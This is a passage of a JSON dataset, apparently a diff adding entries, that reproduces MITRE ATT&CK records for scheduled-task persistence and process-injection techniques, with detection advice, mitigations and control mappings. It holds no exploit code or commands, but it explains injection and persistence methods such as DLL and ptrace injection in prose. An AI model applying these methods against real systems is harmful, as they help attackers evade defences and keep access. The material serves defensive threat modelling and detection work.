scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Container: Container Creation", + "File: File Creation", + "File: File Modification", + "Process: Process Creation", + "Scheduled Job: Scheduled Job Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1053.001", + "name": "Scheduled Task/Job: At (Linux)", + "url": "https://attack.mitre.org/techniques/T1053/001", + "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", + "detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1053.002", + "name": "Scheduled Task/Job: At (Windows)", + "url": "https://attack.mitre.org/techniques/T1053/002", + "description": "Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. \n\nAn adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).\n\nNote: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.", + "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1053.003", + "name": "Scheduled Task/Job: Cron", + "url": "https://attack.mitre.org/techniques/T1053/003", + "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ", + "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1053.005", + "name": "Scheduled Task/Job: Scheduled Task", + "url": "https://attack.mitre.org/techniques/T1053/005", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).", + "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1053.006", + "name": "Scheduled Task/Job: Systemd Timers", + "url": "https://attack.mitre.org/techniques/T1053/006", + "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.", + "detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1053.007", + "name": "Scheduled Task/Job: Container Orchestration Job", + "url": "https://attack.mitre.org/techniques/T1053/007", + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", + "detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 3.3701714285714286, + "adjusted_score": 3.3701714285714286, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-4", + "IA-8", + "RA-5", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1055", + "name": "Process Injection", + "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", + "url": "https://attack.mitre.org/techniques/T1055", + "tactics": [ + "Defense Evasion", + "Privilege Escalation" + ], + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Metadata", + "File: File Modification", + "Module: Module Load", + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1055.001", + "name": "Process Injection: Dynamic-link Library Injection", + "url": "https://attack.mitre.org/techniques/T1055/001", + "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.002", + "name": "Process Injection: Portable Executable Injection", + "url": "https://attack.mitre.org/techniques/T1055/002", + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.003", + "name": "Process Injection: Thread Execution Hijacking", + "url": "https://attack.mitre.org/techniques/T1055/003", + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.004", + "name": "Process Injection: Asynchronous Procedure Call", + "url": "https://attack.mitre.org/techniques/T1055/004", + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.005", + "name": "Process Injection: Thread Local Storage", + "url": "https://attack.mitre.org/techniques/T1055/005", + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.008", + "name": "Process Injection: Ptrace System Calls", + "url": "https://attack.mitre.org/techniques/T1055/008", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1055.009", + "name": "Process Injection: Proc Memory", + "url": "https://attack.mitre.org/techniques/T1055/009", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1055.011", + "name": "Process Injection: Extra 